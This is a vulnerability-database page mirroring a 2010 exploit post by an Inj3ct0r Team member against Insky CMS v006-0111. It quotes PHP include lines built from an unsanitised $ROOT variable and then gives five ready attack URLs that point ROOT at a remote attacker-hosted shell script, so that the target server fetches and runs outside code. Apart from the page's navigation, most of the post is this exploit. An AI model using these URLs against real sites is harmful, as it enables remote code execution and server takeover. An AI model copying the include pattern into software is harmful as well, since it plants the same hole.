Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23430
HistoryMar 23, 2010 - 12:00 a.m.

Insky CMS v006-0111 Multiple Remote File Include Vulnerability

2010-03-2300:00:00
vulners.com
46
JSON

==============================================================
Insky CMS v006-0111 Multiple Remote File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \\\ \/\ \\ 0
0 \//\//\//\ \\ \// \// \// \// \// 1
1 \ \/ >> Exploit database separated by exploit 0
0 \// type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm rahmat punk member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered by: rahmat punk
[+] My id: http://inj3ct0r.com/author/2316
[+] Original: http://inj3ct0r.com/exploits/11410

   &#92;&#92;&#92;|///
  &#92;&#92;  - -  //
   &#40;  @ @ &#41;

----oOOo–()-oOOo--------------------------------------------------
Insky CMS v006-0111 Multiple Remote File Include Vulnerability
Script: http://code.google.com/p/insky/downloads/list
Author: rahmat punk
Mail: [email protected]
---------------Ooooo------------------------------------------------
( )
ooooO ) /
( ) (/
\ (
\_)

Vuln Code

<?..
require_once $ROOT."/insky/class/ext/js/class.js.php";
…?>

      &#40;insky/modules/city.get/city.get.php&#41;
      &#40;insky/modules/city.get/index.php&#41;
      &#40;insky/modules/message2.send/message.send.php&#41;
      &#40;insky/modules/message.send/message.send.php&#41;

<?..
require_once($ROOT."/insky/class/ext/wiki/parserutils.php");
require_once($ROOT.'/insky/wysiwyg/config.php');
require_once($ROOT.'/insky/wysiwyg/editor_class.php');
…?>

      &#40;insky/modules/pages.add/pages.add.php&#41;

Usage: http://[target]/[path]/modules/city.get/city.get.php?ROOT=http://[shellscript]
http://[target]/[path]/modules/city.get/index.php?ROOT=http://[shellscript]
http://[target]/[path]/modules/message2.send/message.send.php?ROOT=http://[shellscript]
http://[target]/[path]/modules/message.send/message.send.php?ROOT=http://[shellscript]
http://[target]/[path]/modules/pages.add/pages.add.php?ROOT=http://[shellscript]

Greetings: All Hackerz

Inj3ct0r.com [2010-03-23]

JSON